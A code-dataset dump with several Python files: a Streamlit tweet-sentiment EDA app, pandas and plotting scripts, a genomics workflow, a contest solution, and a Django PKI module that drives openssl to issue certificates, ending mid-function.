    The class imbalance will need to be addressed to avoid the model being biased towards classifying sentiments as the majority class because the model will be well-versed in identifying it.', unsafe_allow_html=True)\n\n        df = eda_data[mask_sentiment]\n\n        st.markdown(\"### **Visualisations** ###\")\n\n        if st.checkbox('View Tweet length distributions'):\n\n            st.markdown('The first of these explorations will be in the length of various parts of the Tweet body')\n\n            # generate tweet length graph\n            sent_kde_plots(df, 'tweet_length', 'sentiment')\n            st.pyplot()\n\n            st.markdown('Looking at the number of words per tweet, although classes 0 and 1 have the same maximum number of words per tweet at 31 words, classes -1 and 1 have the highest average number of words per tweet at ~19 words. This suggests that people that sent out tweets which are anti and pro man-made climate change send out tweets with more words. News tweets generally have the least number of words with a maximum of 26 and an average of ~16 words per tweet. They do however also display more of a normal distribution, insinuating that news tweets are more consistent in the number of words. The number of words of tweets which are classified as neutral have the greatest distribution with a standard deviation of ~6 words; they vary from \"few\" to \"many\" words in a tweet.')\n\n            # generate character count graph\n            sent_kde_plots(df, 'character_count', 'sentiment')\n            st.pyplot()\n\n            st.write('A similar pattern as established by the number of words per tweet is displayed by the number of characters per tweet. Classes 1 and 0 have the first and second maximum number of characters per tweet at 208 and 166 characters respectively. However, classes 1 and -1 have the highest average number of characters per tweet at ~127 and ~124 characters. A slight difference is that class 2 tweets are on average longer than neutral tweets.')\n\n            # generate punctuation count graph\n            sent_kde_plots(df, 'punctuation_count', 'sentiment')\n            st.pyplot()\n\n            st.markdown('The amount of punctuation displays a number of outliers in each class at 36, 25, 58 and 20 for classes -1, 0, 1 and 2, whilst the averages for each class are ~8, 7, 8 and 9. There is a minuscule difference in the means, so the number of punctuation marks per tweet cannot be used as a unique identifier for any of the sentiment classes.\n    Despite classes -1 and 0 having tweets which have the most characters and words, the differences between these two classes and the other classes, and additionally themselves, are not significant enough to use these two characteristics as features when classifying between the four classes in question. As mentioned above, there are no punctuation patterns that are significant to either class.', unsafe_allow_html=True)
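\n            # Hedged aside (not in the original app): the per-class statistics quoted\n            # above can be recomputed from the engineered columns with a single groupby;\n            # class_stats is a hypothetical name.\n            class_stats = eda_data.groupby('sentiment')[['tweet_length', 'character_count', 'punctuation_count']].mean()\n            # st.write(class_stats)  # uncomment to show the table in the app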
\n\n        st.markdown('### **Wordclouds!** ###')\n\n        # call wordcloud generator\n        if st.checkbox('generate wordclouds'):\n\n            st.markdown('Upon analysis of all the sentiment classes, \"climate change\", \"RT\", \"https\", \"co\" and \"global warming\" are the most popular words/phrases. Even within the individual sentiment classes, the same five words/phrases are the most common.')\n\n            sent = list(df['sentiment'].unique())\n            dft = eda_data.groupby('sentiment')['clean_tweet'].apply(' '.join)\n            for s in sent:\n                fig, ax = plt.subplots()\n                text = dft[s]\n                wordcloud = WordCloud(background_color='white', max_words=100,\n                                      max_font_size=50).generate(text)\n                plt.imshow(wordcloud, interpolation='bilinear')\n                plt.title('Tweets under {} Class'.format(s))\n                plt.axis('off')\n                st.pyplot()\n\n    if selection == \"Technical\":\n\n        ml_img = Image.open(\"resources/imgs/ml_img.png\")\n        st.image(ml_img, use_column_width=True)\n\n        st.info(\"Here you will find a little more technical info on the models available for prediction\")\n\n        tech_inf = markdown(open('resources/vector_model_exp.md').read())\n        st.markdown(tech_inf, unsafe_allow_html=True)\n\n    st.sidebar.title(\"About\")\n    st.sidebar.info(\n        \"\"\"\n    This app is maintained by EDSA students. It serves as a project\n    for a classification sprint.\n\n    **Authors:**\\n\n    Kennedy Mbono\\n\n    Nyandala Ramaru\\n\n    Marcus Moeng\\n\n    Heinrich De Klerk\\n\n    Nombulelo Msibi\\n\n\n\"\"\"\n    )\n# Required to let Streamlit instantiate our web app.\nif __name__ == '__main__':\n    main()\n","sub_path":"base_app.py","file_name":"base_app.py","file_ext":"py","file_size_in_byte":23268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"327634757","text":"import pandas as pd\nimport numpy as np\n\nfrom pandas import Series,DataFrame\n\nnp.random.seed(25)\n\nlinhas = ['linha 1','linha 2','linha 3','linha 4','linha 5','linha 6']\ncolunas = ['coluna 1','coluna 2','coluna 3','coluna 4','coluna 5','coluna 6']\n\ndf = DataFrame(np.random.rand(36).reshape((6,6)),\n               index = linhas,\n               columns= colunas)\n\nprint(df)\nprint('')\nprint(df < .2)\nprint('')\n\nindice = ['linha 1','linha 2','linha 3','linha 4',\n          'linha 5','linha 6','linha 7','linha 8']\n\nseries_obj = Series(np.arange(8), index=indice)\nfiltro = series_obj > 6\n\nprint(series_obj)\nprint('')\nprint(series_obj[filtro])\n\n# index with a list of labels; a bare tuple of labels is treated as a single key\nseries_obj[['linha 1','linha 5','linha 8']] = 8\nprint('')\nprint(series_obj)","sub_path":"FilterData.py","file_name":"FilterData.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"643819032","text":"import os\n\nimport pypeliner\nimport pypeliner.managed as mgd\nfrom wgs.workflows.hmmcopy import tasks\nfrom wgs.utils import helpers\n\n\ndef create_hmmcopy_workflow(\n        bam_file, out_dir, global_config, config,\n        sample_id, bias_pdf, correction_pdf, hmmcopy_pdf,\n        hmmcopy_table, pygenes_table\n):\n\n    workflow = pypeliner.workflow.Workflow()\n\n\n    workflow.transform(\n        name='hmmcopy_readcounter',\n        ctx=helpers.get_default_ctx(\n            
memory=global_config['memory']['low'],\n walltime='2:00', ),\n func=tasks.hmmcopy_readcounter,\n args=(\n mgd.InputFile(bam_file, extensions=['.bai']),\n mgd.TempOutputFile('infile.wig'),\n config,\n )\n )\n\n workflow.transform(\n name='calc_corr',\n func=tasks.calc_corr,\n args=(\n mgd.TempInputFile('infile.wig'),\n mgd.TempOutputFile('infile_copy.txt'),\n mgd.TempOutputFile('infile_copy.obj'),\n config,\n ),\n kwargs={'docker_image': config['docker']['hmmcopy']}\n )\n\n workflow.transform(\n name='run_hmmcopy',\n func=tasks.run_hmmcopy,\n args=(\n mgd.TempInputFile('infile_copy.obj'),\n mgd.TempInputFile('infile_copy.txt'),\n mgd.TempOutputFile('hmmcopy_res.obj'),\n mgd.TempOutputFile('hmmcopy_segments.txt'),\n mgd.OutputFile(hmmcopy_table),\n sample_id,\n config,\n ),\n kwargs={'docker_image': config['docker']['hmmcopy']}\n )\n\n workflow.transform(\n name='plot_hmm',\n func=tasks.plot_hmm,\n args=(\n mgd.TempInputFile('infile_copy.obj'),\n mgd.TempInputFile('hmmcopy_res.obj'),\n mgd.TempSpace('correction_plots_dir'),\n mgd.TempSpace('hmmcopy_plots_dir'),\n mgd.OutputFile(bias_pdf),\n mgd.OutputFile(correction_pdf),\n mgd.OutputFile(hmmcopy_pdf),\n ),\n kwargs={'docker_image': config['docker']['hmmcopy']}\n )\n\n workflow.transform(\n name='annot_hmm',\n func=tasks.annot_hmm,\n args=(\n mgd.TempInputFile('hmmcopy_segments.txt'),\n mgd.OutputFile(pygenes_table),\n config,\n )\n )\n\n return workflow\n","sub_path":"wgs/workflows/hmmcopy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"560493124","text":"def read_tokens():\n return input().strip().split(' ')\n\n\ndef read_ints():\n return [int(s) for s in read_tokens()]\n\n\ndef solve(n: int, k: int) -> list:\n ans = []\n if n < k:\n return ans\n\n if n % 2 != 0 and k % 2 == 0:\n return ans\n\n if n % k == 0:\n return [n // k] * k\n\n if n == k:\n return [1] * k\n\n if n % 2 == 0 and k % 2 != 0:\n if n < 2*k:\n return []\n for i in range(k-1):\n ans.append(2)\n ans.append(n - 2*(k-1))\n return ans\n\n if (n % 2 == 0 and k % 2 == 0) or (n % 2 != 0 and k % 2 != 0):\n for i in range(k-1):\n ans.append(1)\n ans.append(n - (k - 1))\n return ans\n\n return []\n\n\nT = int(input())\n\nfor test in range(T):\n n, k = read_ints()\n arr = solve(n, k)\n if len(arr) == 0:\n print(\"NO\")\n continue\n print(\"YES\")\n for el in arr:\n print(el, end=\" \")\n print()\n","sub_path":"contests/640/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"158690466","text":"from pylab import *\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import rc\nrc ('font', **{'family':'sans-serif', 'sans-serif':'Linux Biolinum', 'size':16})\n\ndef float_eq (a, b):\n return abs(a - b) < min (1e-3 * a, 1e-3 * b)\n\n# InA, InB, out\ndata = []\n\nwith open (\"test-dc-out\") as f:\n for line in f:\n ina, inb, out = line.split ()\n ina = float (ina.rstrip(','))\n inb = float (inb.rstrip(','))\n out = float (out.rstrip(','))\n data.append ((ina, inb, out))\n\ndata.sort ()\n\n#######################################\n# Plot: output vs. 
InA over eight InBs\ninbs = sorted (set (i[1] for i in data))\ninbs_plot = inbs[::len(inbs)//7]\nprint (inbs_plot)\nfor inb in inbs_plot:\n plot_x = [i[0] for i in data if i[1] == inb]\n plot_y = [i[2] for i in data if i[1] == inb]\n\n # Generate a text label on the line\n # First, find the rotation angle for it\n coeffs = polyfit (plot_x, plot_y, 1)\n angle = arctan (coeffs[0]) * (180/pi) * 0.65\n\n # Now, the position\n text_x = 0.6\n text_y = plot_y[17*len(plot_y)//20] * 1.3\n if text_y >= -0.1:\n text_y += 0.025\n else:\n text_y /= 1.4\n text_y += 0.1\n print (text_y)\n\n text (text_x, text_y, 'InB=%.2f V' % inb, rotation=angle)\n plot (plot_x, plot_y, 'b')\n\nxlabel (\"Input A (V)\")\nylabel (\"Multiplier output (V)\")\ntitle (\"Multiplier Transfer Characteristic\")\ngrid ()\nsavefig ('transfer.eps')\nshow ()\n\n#######################################\n# Plot: output vs. InB when InA = 0.25\ninbs = []\nouts = []\nfor ina, inb, out in data:\n if ina > 0.24 and ina < 0.26:\n inbs.append (inb)\n outs.append (out)\n\ncoeffs = polyfit (inbs, outs, 1)\nouts_ideal = [polyval (coeffs, i) for i in inbs]\n\nplot (inbs, outs, 'r', label=\"Measured output\")\nplot (inbs, outs_ideal, 'b', label=\"Ideal output\")\nxlabel (\"Input B (V)\")\nylabel (\"Multiplier output (V)\")\ntitle (\"Transfer Curve and Ideal Response (Input A = 0.25V)\")\ngrid ()\nlegend (loc=2)\nsavefig ('transfer-a25.eps')\nshow ()\n\n\n############################################\n# Plot: output vs. InB error when InA = 0.25\ninbs = []\nouts = []\nfor ina, inb, out in data:\n if ina > 0.24 and ina < 0.26:\n inbs.append (inb)\n outs.append (out)\n\ncoeffs = polyfit (inbs, outs, 1)\nouts_ideal = [polyval (coeffs, i) for i in inbs]\n\nerrors = [(i - j) for i, j in zip (outs, outs_ideal)]\nplot (inbs, errors)\nxlabel (\"Input B (V)\")\nylabel (\"Error\")\ntitle (\"Error\")\ngrid ()\nsavefig ('error.eps')\nshow ()\n\n\n","sub_path":"GilbertCell/testing/generate-plot.py","file_name":"generate-plot.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"495146924","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/mgallet/Github/Penates-Server/penatesserver/pki/service.py\n# Compiled at: 2015-12-29 03:19:15\n\"\"\"\nmy_ca = PKI(dirname=\"/tmp/test\")\nmy_ca.initialize()\nmy_ca.gen_ca(CertificateEntry(\"ca.19pouces.net\", role=CA))\n\"\"\"\nfrom __future__ import unicode_literals, with_statement, print_function\nimport base64, codecs, hashlib, os, datetime, re, shlex, shutil\nfrom subprocess import CalledProcessError\nimport subprocess, tempfile\nfrom django.conf import settings\nfrom django.core.urlresolvers import reverse\nfrom django.template.loader import render_to_string\nfrom django.utils.text import slugify\nfrom django.utils.timezone import utc\nfrom penatesserver.filelocks import Lock\nfrom penatesserver.pki.constants import ROLES, RSA, RESOURCE, USER, ENCIPHERMENT, SIGNATURE, EMAIL, COMPUTER_TEST, COMPUTER, CA\nfrom penatesserver.utils import t61_to_time, ensure_location\n\ndef local(command, cwd=None):\n return subprocess.check_output(shlex.split(command), shell=False, cwd=cwd, stderr=subprocess.PIPE)\n\n\n__author__ = b'Matthieu Gallet'\n\nclass CertificateEntry(object):\n\n def __init__(self, commonName, organizationName=b'', organizationalUnitName=b'', emailAddress=b'', localityName=b'', countryName=b'', 
stateOrProvinceName=b'', altNames=None, role=RESOURCE, dirname=None):\n self.commonName = commonName\n self.organizationName = organizationName\n self.organizationalUnitName = organizationalUnitName\n self.emailAddress = emailAddress\n self.localityName = localityName\n self.countryName = countryName\n self.stateOrProvinceName = stateOrProvinceName\n self.altNames = altNames or []\n self.role = role\n self.dirname = dirname or settings.PKI_PATH\n\n @property\n def filename(self):\n basename = b'%s_%s' % (self.role, self.commonName)\n return slugify(basename)\n\n @property\n def values(self):\n return ROLES[self.role]\n\n @property\n def key_filename(self):\n return os.path.join(self.dirname, b'private', b'keys', self.filename + b'.key.pem')\n\n @property\n def pub_filename(self):\n return os.path.join(self.dirname, b'pubkeys', self.filename + b'.pub.pem')\n\n @property\n def ssh_filename(self):\n return os.path.join(self.dirname, b'pubsshkeys', self.filename + b'.pub')\n\n @property\n def sshfp_sha1(self):\n with codecs.open(self.ssh_filename, b'r', encoding=b'utf-8') as (fd):\n method, content = fd.read().split(b' ')\n value = hashlib.sha1(base64.b64decode(content)).hexdigest()\n code = {b'ssh-rsa': 1, b'ssh-dss': 2, b'ecdsa-sha2-nistp256': 3, b'ssh-ed25519': 4}.get(method, 0)\n return b'%s 1 %s' % (code, value)\n\n @property\n def sshfp_sha256(self):\n with codecs.open(self.ssh_filename, b'r', encoding=b'utf-8') as (fd):\n method, content = fd.read().split(b' ')\n value = hashlib.sha256(base64.b64decode(content)).hexdigest()\n code = {b'ssh-rsa': 1, b'ssh-dss': 2, b'ecdsa-sha2-nistp256': 3, b'ssh-ed25519': 4}.get(method, 0)\n return b'%s 2 %s' % (code, value)\n\n @property\n def crt_filename(self):\n return os.path.join(self.dirname, b'certs', self.filename + b'.crt.pem')\n\n @property\n def req_filename(self):\n return os.path.join(self.dirname, b'private', b'req', self.filename + b'.req.pem')\n\n @property\n def ca_filename(self):\n return os.path.join(self.dirname, b'cacert.pem')\n\n @property\n def crt_sha256(self):\n return self.pem_hash(self.crt_filename, hashlib.sha256)\n\n @property\n def pub_sha256(self):\n return self.pem_hash(self.pub_filename, hashlib.sha256)\n\n @property\n def crt_sha512(self):\n return self.pem_hash(self.crt_filename, hashlib.sha512)\n\n @property\n def pub_sha512(self):\n return self.pem_hash(self.pub_filename, hashlib.sha512)\n\n @staticmethod\n def pem_hash(filename, hash_cls=None):\n if hash_cls is None:\n hash_cls = hashlib.sha256\n with codecs.open(filename, b'r', encoding=b'utf-8') as (fd):\n content = fd.read()\n b64_der = (b'').join(content.splitlines()[1:-1])\n der = base64.b64decode(b64_der)\n return hash_cls(der).hexdigest()\n\n def __repr__(self):\n return self.commonName\n\n def __unicode__(self):\n return self.commonName\n\n def __str__(self):\n return self.commonName\n\n\nclass PKI(object):\n\n def __init__(self, dirname=None):\n self.dirname = dirname or settings.PKI_PATH\n self.cacrl_path = os.path.join(self.dirname, b'cacrl.pem')\n self.careq_path = os.path.join(self.dirname, b'private', b'careq.pem')\n self.crt_sources_path = os.path.join(self.dirname, b'crt_sources.txt')\n self.cacrt_path = os.path.join(self.dirname, b'cacert.pem')\n self.users_crt_path = os.path.join(self.dirname, b'users_crt.pem')\n self.hosts_crt_path = os.path.join(self.dirname, b'hosts_crt.pem')\n self.services_crt_path = os.path.join(self.dirname, b'services_crt.pem')\n self.cakey_path = os.path.join(self.dirname, b'private', b'cakey.pem')\n self.users_key_path = 
os.path.join(self.dirname, b'private', b'users_key.pem')\n self.hosts_key_path = os.path.join(self.dirname, b'private', b'hosts_key.pem')\n self.services_key_path = os.path.join(self.dirname, b'private', b'services_key.pem')\n\n def get_subca_infos(self, entry):\n assert isinstance(entry, CertificateEntry)\n if entry.role in (USER, EMAIL, SIGNATURE, ENCIPHERMENT):\n return (self.users_crt_path, self.users_key_path)\n if entry.role in (COMPUTER, COMPUTER_TEST):\n return (self.hosts_crt_path, self.hosts_key_path)\n if entry.role == CA:\n return (self.cacrt_path, self.cakey_path)\n return (\n self.services_crt_path, self.services_key_path)\n\n def initialize(self):\n with Lock(settings.PENATES_LOCKFILE):\n serial = os.path.join(self.dirname, b'serial.txt')\n index = os.path.join(self.dirname, b'index.txt')\n ensure_location(serial)\n if not os.path.isfile(serial):\n with codecs.open(serial, b'w', encoding=b'utf-8') as (fd):\n fd.write(b'01\\n')\n if not os.path.isfile(index):\n with codecs.open(index, b'w', encoding=b'utf-8') as (fd):\n fd.write(b'')\n ensure_location(os.path.join(self.dirname, b'new_certs', b'0'))\n\n def ensure_key(self, entry):\n \"\"\"\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n if not self.__check_key(entry, entry.key_filename):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_key(entry)\n self.__gen_pub(entry)\n self.__gen_ssh(entry)\n elif not self.__check_pub(entry, entry.pub_filename):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_pub(entry)\n self.__gen_ssh(entry)\n elif not self.__check_ssh(entry, entry.ssh_filename):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_ssh(entry)\n\n def ensure_certificate(self, entry):\n \"\"\"\n\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n if not self.__check_key(entry, entry.key_filename):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_key(entry)\n self.__gen_pub(entry)\n self.__gen_ssh(entry)\n self.__gen_request(entry)\n self.__gen_certificate(entry)\n elif not self.__check_certificate(entry, entry.crt_filename):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_request(entry)\n self.__gen_certificate(entry)\n\n def __gen_openssl_conf(self, entry=None, ca_infos=None):\n \"\"\"\n principal: used to define values\n ca: used to define issuer values for settings.CA_POINT, settings.CRL_POINT, settings.OCSP_POINT\n temp_object: used to track temporary files and correctly remove them after use\n keyType: used to define issuer values for settings.CA_POINT, settings.CRL_POINT, settings.OCSP_POINT,\n settings.KERBEROS_REALM\n crts: list of revoked Certificate objects\n\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n if ca_infos is None:\n ca_crt_path, ca_key_path = self.cacrt_path, self.cakey_path\n else:\n ca_crt_path, ca_key_path = ca_infos\n context = {b'dirname': self.dirname, b'policy_details': [], b'crlPoint': b'', b'caPoint': b'', b'altSection': b'', b'altNamesString': b'', b'krbRealm': b'', b'krbClientName': b'', b'ca_key_path': ca_key_path, b'ca_crt_path': ca_crt_path}\n if entry is not None:\n assert isinstance(entry, CertificateEntry)\n role = ROLES[entry.role]\n for key in ('organizationName', 'organizationalUnitName', 'emailAddress',\n 'localityName', 'stateOrProvinceName', 'countryName', 'commonName'):\n context[key] = getattr(entry, key)\n\n alt_names = list(entry.altNames)\n for k in ('basicConstraints', 'subjectKeyIdentifier', 'authorityKeyIdentifier'):\n context[b'policy_details'].append((k, 
role[k]))\n\n for k in ('keyUsage', 'extendedKeyUsage', 'nsCertType'):\n context[b'policy_details'].append((k, (b', ').join(role[k])))\n\n if b'1.3.6.1.5.2.3.4' in role[b'extendedKeyUsage'] and settings.PENATES_REALM:\n alt_names.append(('otherName', '1.3.6.1.5.2.2;SEQUENCE:princ_name'))\n context[b'krbRealm'] = settings.PENATES_REALM\n context[b'krbClientName'] = entry.commonName\n if b'1.3.6.1.5.2.3.5' in role[b'extendedKeyUsage'] and settings.PENATES_REALM:\n alt_names.append(('otherName', '1.3.6.1.5.2.2;SEQUENCE:kdc_princ_name'))\n context[b'krbRealm'] = settings.PENATES_REALM\n if alt_names:\n alt_list = [ (b'{0}.{1} = {2}').format(alt[0], i, alt[1]) for i, alt in enumerate(alt_names) ]\n context[b'altNamesString'] = (b'\\n').join(alt_list)\n context[b'altSection'] = b'subjectAltName=@alt_section'\n if settings.SERVER_NAME:\n context[b'crlPoint'] = b'%s://%s%s' % (settings.PROTOCOL, settings.SERVER_NAME, reverse(b'get_crl'))\n context[b'caPoint'] = b'%s://%s%s' % (settings.PROTOCOL, settings.SERVER_NAME,\n reverse(b'get_ca_certificate', kwargs={b'kind': b'ca'}))\n conf_content = render_to_string(b'penatesserver/pki/openssl.cnf', context)\n conf_path = os.path.join(self.dirname, b'openssl.cnf')\n with codecs.open(conf_path, b'w', encoding=b'utf-8') as (conf_fd):\n conf_fd.write(conf_content)\n return conf_path\n\n @staticmethod\n def __gen_key(entry):\n u\"\"\" generates the private key for the given entry\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n role = ROLES[entry.role]\n ensure_location(entry.key_filename)\n if role[b'keyType'] == RSA:\n local((b'\"{openssl}\" genrsa -out {key} {bits}').format(bits=role[b'rsaBits'], openssl=settings.OPENSSL_PATH, key=entry.key_filename))\n else:\n with tempfile.NamedTemporaryFile() as (fd):\n param = fd.name\n local((b'\"{openssl}\" dsaparam -rand -genkey {bits} -out \"{param}\"').format(bits=role[b'dsaBits'], openssl=settings.OPENSSL_PATH, param=param))\n local((b'\"{openssl}\" gendsa -out \"{key}\" \"{param}\"').format(openssl=settings.OPENSSL_PATH, param=param, key=entry.key_filename))\n os.remove(param)\n os.chmod(entry.key_filename, 384)\n\n @staticmethod\n def __gen_pub(entry):\n u\"\"\" generates the public key for the given entry\n the private key must already exist\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n role = ROLES[entry.role]\n ensure_location(entry.pub_filename)\n if role[b'keyType'] == RSA:\n local((b'\"{openssl}\" rsa -in \"{key}\" -out \"{pub}\" -pubout').format(openssl=settings.OPENSSL_PATH, key=entry.key_filename, pub=entry.pub_filename))\n else:\n local((b'\"{openssl}\" dsa -in \"{key}\" -out \"{pub}\" -pubout').format(openssl=settings.OPENSSL_PATH, key=entry.key_filename, pub=entry.pub_filename))\n\n @staticmethod\n def __gen_ssh(entry):\n u\"\"\" generates the SSH public key for the given entry\n the private key must already exist\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n result = local((b'\"{ssh_keygen}\" -y -f \"{inkey}\" ').format(inkey=entry.key_filename, ssh_keygen=settings.SSH_KEYGEN_PATH))\n ensure_location(entry.ssh_filename)\n with open(entry.ssh_filename, b'wb') as (ssh_fd):\n ssh_fd.write(result)\n\n def __gen_request(self, entry):\n u\"\"\" generates a certificate signing request for the given entry\n the private key must already exist\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n conf_path = self.__gen_openssl_conf(entry)\n role = 
ROLES[entry.role]\n ensure_location(entry.req_filename)\n local((b'\"{openssl}\" req -out \"{out}\" -batch -utf8 -new -key \"{inkey}\" -{digest} -config \"{config}\" -extensions role_req').format(openssl=settings.OPENSSL_PATH, inkey=entry.key_filename, digest=role[b'digest'], config=conf_path, out=entry.req_filename))\n\n def __gen_certificate(self, entry):\n u\"\"\" generates a certificate for the given entry\n the certificate request must already exist, as well as the CA\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n ensure_location(entry.crt_filename)\n subca_infos = self.get_subca_infos(entry)\n conf_path = self.__gen_openssl_conf(entry, ca_infos=subca_infos)\n role = ROLES[entry.role]\n local((b'\"{openssl}\" ca -config \"{cfg}\" -extensions role_req -in \"{req}\" -out \"{crt}\" -notext -days {days} -md {digest} -batch -utf8 ').format(openssl=settings.OPENSSL_PATH, cfg=conf_path, req=entry.req_filename, crt=entry.crt_filename, days=role[b'days'], digest=role[b'digest']))\n serial = self.__get_certificate_serial(entry.crt_filename)\n with codecs.open(self.crt_sources_path, b'a', encoding=b'utf-8') as (fd):\n fd.write(b'%s\\t%s\\t%s\\t%s\\n' % (serial, os.path.relpath(entry.key_filename, self.dirname),\n os.path.relpath(entry.req_filename, self.dirname),\n os.path.relpath(entry.crt_filename, self.dirname)))\n\n def __gen_ca_key(self, entry):\n \"\"\"\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n role = ROLES[entry.role]\n ensure_location(self.cakey_path)\n if role[b'keyType'] == RSA:\n local((b'\"{openssl}\" genrsa -out {key} {bits}').format(bits=role[b'rsaBits'], openssl=settings.OPENSSL_PATH, key=self.cakey_path))\n else:\n with tempfile.NamedTemporaryFile() as (fd):\n param = fd.name\n local((b'\"{openssl}\" dsaparam -rand -genkey {bits} -out \"{param}\"').format(bits=role[b'dsaBits'], openssl=settings.OPENSSL_PATH, param=param))\n local((b'\"{openssl}\" gendsa -out \"{key}\" \"{param}\"').format(openssl=settings.OPENSSL_PATH, param=param, key=self.cakey_path))\n os.remove(param)\n os.chmod(self.cakey_path, 384)\n\n def __gen_ca_req(self, entry):\n \"\"\"\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n role = ROLES[entry.role]\n ensure_location(entry.req_filename)\n conf_path = self.__gen_openssl_conf(entry)\n local((b'\"{openssl}\" req -out \"{out}\" -batch -utf8 -new -key \"{inkey}\" -{digest} -config \"{config}\" -extensions role_req').format(openssl=settings.OPENSSL_PATH, inkey=self.cakey_path, digest=role[b'digest'], config=conf_path, out=entry.req_filename))\n\n def __gen_ca_crt(self, entry):\n \"\"\"\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n conf_path = self.__gen_openssl_conf(entry)\n role = ROLES[entry.role]\n ensure_location(self.cacrt_path)\n local((b'\"{openssl}\" ca -config \"{cfg}\" -selfsign -extensions role_req -in \"{req}\" -out \"{crt}\" -notext -days {days} -md {digest} -batch -utf8 ').format(openssl=settings.OPENSSL_PATH, cfg=conf_path, req=entry.req_filename, crt=self.cacrt_path, days=role[b'days'], digest=role[b'digest']))\n\n def ensure_ca(self, entry):\n u\"\"\" if the CA private key does not exist, creates a new CA\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n \"\"\"\n if not self.__check_key(entry, self.cakey_path):\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_ca_key(entry)\n self.__gen_ca_req(entry)\n 
self.__gen_ca_crt(entry)\n for sub_name in ('users', 'services', 'hosts'):\n sub_entry = CertificateEntry(b'%s.%s' % (sub_name, entry.commonName), organizationName=entry.organizationName, organizationalUnitName=entry.organizationalUnitName, emailAddress=entry.emailAddress, localityName=entry.localityName, countryName=entry.countryName, stateOrProvinceName=entry.stateOrProvinceName, dirname=entry.dirname, role=CA)\n self.ensure_certificate(sub_entry)\n shutil.copy(sub_entry.crt_filename, getattr(self, b'%s_crt_path' % sub_name))\n shutil.copy(sub_entry.key_filename, getattr(self, b'%s_key_path' % sub_name))\n\n @staticmethod\n def __check_pub(entry, path):\n \"\"\" true if the public key is valid\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n :return:\n :rtype: `boolean`\n \"\"\"\n if not os.path.isfile(path):\n return False\n cmd = b'rsa' if ROLES[entry.role][b'keyType'] == RSA else b'dsa'\n try:\n local((b'\"{openssl}\" {cmd} -pubout -pubin -in \"{path}\"').format(openssl=settings.OPENSSL_PATH, cmd=cmd, path=path))\n except CalledProcessError:\n return False\n\n return True\n\n @staticmethod\n def __check_key(entry, path):\n u\"\"\" true if the private key is valid\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n :return:\n :rtype: `boolean`\n \"\"\"\n if not os.path.isfile(path):\n return False\n cmd = b'rsa' if ROLES[entry.role][b'keyType'] == RSA else b'dsa'\n try:\n local((b'\"{openssl}\" {cmd} -pubout -in \"{path}\"').format(openssl=settings.OPENSSL_PATH, cmd=cmd, path=path))\n except CalledProcessError:\n return False\n\n return True\n\n @staticmethod\n def __check_ssh(entry, path):\n \"\"\" true if the SSH public key is valid\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n :return:\n :rtype: `boolean`\n \"\"\"\n entry = entry\n if not os.path.isfile(path):\n return False\n return True\n\n @staticmethod\n def __check_req(entry, path):\n u\"\"\" true if the certificate request is valid\n :param entry:\n :type entry: :class:`penatesserver.pki.service.CertificateEntry`\n :return:\n :rtype: `boolean`\n \"\"\"\n entry = entry\n if not os.path.isfile(path):\n return False\n try:\n local((b'\"{openssl}\" req -pubkey -noout -in \"{path}\"').format(openssl=settings.OPENSSL_PATH, path=path))\n except CalledProcessError:\n return False\n\n return True\n\n def __check_certificate(self, entry, path):\n entry = entry\n if not os.path.isfile(path):\n return False\n else:\n try:\n stdout = local((b'\"{openssl}\" x509 -enddate -noout -in \"{path}\"').format(openssl=settings.OPENSSL_PATH, path=path))\n except CalledProcessError:\n return False\n\n stdout = stdout.decode(b'utf-8')\n end_date = t61_to_time(stdout.partition(b'=')[2].strip())\n after_now = datetime.datetime.now(tz=utc) + datetime.timedelta(30)\n if end_date is None or end_date < after_now:\n return False\n serial = self.__get_certificate_serial(path)\n if serial is None:\n return False\n if self.__get_index_file()[serial][1] != b'V':\n return False\n return True\n\n def revoke_certificate(self, crt_content, regen_crl=True):\n with Lock(settings.PENATES_LOCKFILE):\n with tempfile.NamedTemporaryFile() as (fd):\n fd.write(crt_content.encode(b'utf-8'))\n fd.flush()\n serial = self.__get_certificate_serial(fd.name)\n infos = self.__get_index_file()[serial]\n if infos[1] != b'V':\n return\n conf_path = self.__gen_openssl_conf()\n local((b'\"{openssl}\" ca -config \"{cfg}\" -revoke 